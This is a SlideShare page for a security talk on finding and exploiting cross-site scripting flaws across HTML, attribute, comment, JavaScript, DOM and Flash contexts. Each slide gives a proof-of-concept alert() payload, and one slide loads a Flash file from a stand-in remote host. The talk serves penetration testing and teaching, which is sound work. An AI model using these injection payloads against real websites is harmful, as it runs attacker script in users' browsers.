SlideShare a Scribd company logo

How To Detect Xss

Download as PPT, PDF
Ferruh Mavituna
Ferruh Mavituna

The document discusses different types of cross-site scripting (XSS) vulnerabilities and how to detect and exploit them. It outlines the main places where output can be injected, including directly into HTML, JavaScript blocks, attributes, comments, and Flash. It then provides examples and demonstrations of exploiting XSS in each of these contexts, such as by injecting JavaScript alerts. The document concludes by noting challenges in exploiting XSS and the importance of testing payloads with and without encoding.

1 of 27
Downloaded 170 times
www.portcullis-security.com Portcullis Computer Security
How to detect and exploit %99 of XSS Vulnerabilities
XSS? So What? Recently XSS has proven to be dangerous enough to consider. And it allows you to jump into VPN or it allows you to bypass firewall rules via XSS Tunnelling.
What is it about? It’s all about where output goes… Straight into HTML Into Javascript / VbScript block As tag attribute And some other rare, strange places…
Understanding exploiting XSS It’s like SQL injection but now our subsystem is not a database it’s a browser and instead of a single quote we’ve got some new meta characters.
Ultimate Challenge Ultimate challenge of XSS issues is able to escape current block and make browsers render your piece of code.
XSS Types These are most common XSS examples which you are going to see in the wild. I’ll try to show a demo to exploit them. HTML – Normal HTML – Attribute without quotes HTML – Attribute with single quotes HTML – In Comments HTML – In Javascript Blocks DOM based XSS Flash based XSS Direct Linking
Not Covered Before jumping into exploiting these specific issues; Following rare but has seen concepts are not covered in this talk. XAS – Cross Application Scripting Security Zones of IE Client-Site issues like .jar problem Advanced Flash Analyzes for XSS Exploiting XSS in real world Bypassing HTML parsing based XSS filters like gmail, myspace etc.
HTML - Normal Most common XSS type, At least it was the most common one. But nowadays most of the developers aware of it. In this demo we assumed there is no filtering in the server-side.
HTML - Normal DEMO <script>alert(0x1)</script>
HTML – Attributes without Quotes When output used as an HTML attribute in the application, if it’s coded in a sloppy HTML which has no quotes around it even if there is a server-side filtering we can bypass it!
HTML – Attributes without Quotes DEMO %20 onload=alert(0x2) %20
HTML – Attributes with Single Quotes Wrapping HTML attributes with a single quote is quite common, valid but a poor practice. Since single quote is not considered as HTML meta character is not encoded by any of default XSS filter functions like html_entities() or Server.HTMLEncode()‏
HTML –Attributes with Single Quotes DEMO ’ onload=alert(0x3)‏
HTML – In Comments If output goes into an HTML comment we need “>” closing tag. This will be encoded by default filters, so it should be unfiltered.
HTML – In Comments DEMO --!><script>alert(0x4)</script>
HTML – Javascript Blocks Javascript blocks are too dangerous because meta characters are changing in there. If output goes into javascript we are not tag opener any more or double quotes. It all depends where it goes in Javascript, we may need a single quote, may need a double quotes or maybe only a space or semi column.
HTML – In Comments DEMO ;alert(0x5)‏
HTML – DOM Based This is one of the most rare and hard to spot XSS types. You need a simple source code analyse over the script code. Most of DOM based XSS issues can not be identified by automated scanners ( to be honest non of them! )‏
HTML – In Comments DEMO #alert(0x6)‏
HTML – Flash Based XSS It’s being more and more popular There are several ways to see an XSS issue in Flash but most common ones Remote flash file loading Direct Linking Flash application generally load remote resources and if this resources can be controlled by parameters then it can be called directly and can be forced to call a remote malisious flash object.
HTML – Flash Based XSS DEMO vuln.swf?player=http://example.com/xss.swf _getURL(‘javascript:alert(0x7)’)‏
HTML – Direct Linking If linking functionality exist almost, always vulnerable to this attack! It can be something like Your e-mail address Homepage URL Your photo URL etc….
HTML – Flash Based XSS DEMO javascript:alert(0x8)‏
Final Words If a XSS issue is exploitable in Internet Explorer it’s highly possibly exploitable in Mozilla based browser, attack vector may differs . CSS expression() and –moz-binding can allow you to trigger XSS payloads onload
Final Words Know what you send… Your browser can do some encoding which may invalidate your XSS test To able to exploit target server you may need to send HTML characters without proper encoding Confirm what you send from your proxy and be sure you tested it with encoding and without encoding
vbscript:msgbox(‘Any Questions?’)
Ad

Recommended

Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Pichaya Morimoto
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filter
kuza55
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection Vulnerabilities
Mindfire Solutions
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
Akash Mahajan
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
Paul Ionescu
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
kuza55
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
beched
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
Paul Ionescu
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injections and Behind...
SQL Injections and Behind...SQL Injections and Behind...
SQL Injections and Behind...
arjunguptam
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
Jose Mato
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
Mathias Karlsson
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net Framework
Ramakanta Behera
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
snoopythesecuritydog
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Ad

More Related Content

What's hot (20)

Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
kuza55
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
beched
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
Paul Ionescu
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injections and Behind...
SQL Injections and Behind...SQL Injections and Behind...
SQL Injections and Behind...
arjunguptam
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
Jose Mato
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
Mathias Karlsson
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net Framework
Ramakanta Behera
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
kuza55
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
beched
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
Paul Ionescu
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injections and Behind...
SQL Injections and Behind...SQL Injections and Behind...
SQL Injections and Behind...
arjunguptam
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
Jose Mato
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
Mathias Karlsson
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net Framework
Ramakanta Behera
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 

Similar to How To Detect Xss (20)

XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
snoopythesecuritydog
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Web application security for java (XSS,Session Fixation)
Web application security for java (XSS,Session Fixation)Web application security for java (XSS,Session Fixation)
Web application security for java (XSS,Session Fixation)
Ritesh Raushan
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
Cristian Alexandrescu
 
Ultimate xss
Ultimate xssUltimate xss
Ultimate xss
ARahim Özel
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
matthewhughes
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Romanian Cyber Conference
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
CA API Management
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
Raghunath G
 
Xss 101
Xss 101Xss 101
Xss 101
n|u - The Open Security Community
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
Minded Security
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
adonatwork
 
Unusual Web Bugs
Unusual Web BugsUnusual Web Bugs
Unusual Web Bugs
amiable_indian
 
Web Bugs
Web BugsWeb Bugs
Web Bugs
Dr Rushi Raval
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
kuza55
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
Shawn Gorrell
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
snoopythesecuritydog
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Web application security for java (XSS,Session Fixation)
Web application security for java (XSS,Session Fixation)Web application security for java (XSS,Session Fixation)
Web application security for java (XSS,Session Fixation)
Ritesh Raushan
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
Cristian Alexandrescu
 
Ultimate xss
Ultimate xssUltimate xss
Ultimate xss
ARahim Özel
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
matthewhughes
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Romanian Cyber Conference
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
CA API Management
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
Raghunath G
 
Xss 101
Xss 101Xss 101
Xss 101
n|u - The Open Security Community
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
Minded Security
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
adonatwork
 
Unusual Web Bugs
Unusual Web BugsUnusual Web Bugs
Unusual Web Bugs
amiable_indian
 
Web Bugs
Web BugsWeb Bugs
Web Bugs
Dr Rushi Raval
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
kuza55
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
Shawn Gorrell
 
Ad

More from Ferruh Mavituna (12)

One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
Ferruh Mavituna
 
Web Tarayıcılarının Evrimi
Web Tarayıcılarının EvrimiWeb Tarayıcılarının Evrimi
Web Tarayıcılarının Evrimi
Ferruh Mavituna
 
One Click Ownage
One Click OwnageOne Click Ownage
One Click Ownage
Ferruh Mavituna
 
5 Dakkada Beşiktaş
5 Dakkada Beşiktaş5 Dakkada Beşiktaş
5 Dakkada Beşiktaş
Ferruh Mavituna
 
One Click Ownage
One Click OwnageOne Click Ownage
One Click Ownage
Ferruh Mavituna
 
One Click Ownage
One Click OwnageOne Click Ownage
One Click Ownage
Ferruh Mavituna
 
Insecure Trends in Web 2.0
Insecure Trends in Web 2.0Insecure Trends in Web 2.0
Insecure Trends in Web 2.0
Ferruh Mavituna
 
Flash Security
Flash SecurityFlash Security
Flash Security
Ferruh Mavituna
 
DoS Attacks Using Sql Wildcards
DoS Attacks Using Sql WildcardsDoS Attacks Using Sql Wildcards
DoS Attacks Using Sql Wildcards
Ferruh Mavituna
 
XSS Tunnelling
XSS TunnellingXSS Tunnelling
XSS Tunnelling
Ferruh Mavituna
 
Guvenli Flash Uygulamalari
Guvenli Flash UygulamalariGuvenli Flash Uygulamalari
Guvenli Flash Uygulamalari
Ferruh Mavituna
 
Web 2.0 Guvenlik Trendleri
Web 2.0 Guvenlik TrendleriWeb 2.0 Guvenlik Trendleri
Web 2.0 Guvenlik Trendleri
Ferruh Mavituna
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
Ferruh Mavituna
 
Web Tarayıcılarının Evrimi
Web Tarayıcılarının EvrimiWeb Tarayıcılarının Evrimi
Web Tarayıcılarının Evrimi
Ferruh Mavituna
 
One Click Ownage
One Click OwnageOne Click Ownage
One Click Ownage
Ferruh Mavituna
 
5 Dakkada Beşiktaş
5 Dakkada Beşiktaş5 Dakkada Beşiktaş
5 Dakkada Beşiktaş
Ferruh Mavituna
 
One Click Ownage
One Click OwnageOne Click Ownage
One Click Ownage
Ferruh Mavituna
 
One Click Ownage
One Click OwnageOne Click Ownage
One Click Ownage
Ferruh Mavituna
 
Insecure Trends in Web 2.0
Insecure Trends in Web 2.0Insecure Trends in Web 2.0
Insecure Trends in Web 2.0
Ferruh Mavituna
 
Flash Security
Flash SecurityFlash Security
Flash Security
Ferruh Mavituna
 
DoS Attacks Using Sql Wildcards
DoS Attacks Using Sql WildcardsDoS Attacks Using Sql Wildcards
DoS Attacks Using Sql Wildcards
Ferruh Mavituna
 
XSS Tunnelling
XSS TunnellingXSS Tunnelling
XSS Tunnelling
Ferruh Mavituna
 
Guvenli Flash Uygulamalari
Guvenli Flash UygulamalariGuvenli Flash Uygulamalari
Guvenli Flash Uygulamalari
Ferruh Mavituna
 
Web 2.0 Guvenlik Trendleri
Web 2.0 Guvenlik TrendleriWeb 2.0 Guvenlik Trendleri
Web 2.0 Guvenlik Trendleri
Ferruh Mavituna
 
Ad

Recently uploaded (20)

Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)
Ortus Solutions, Corp
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Big Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur MorganBig Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Mobile App Development Company in Saudi Arabia
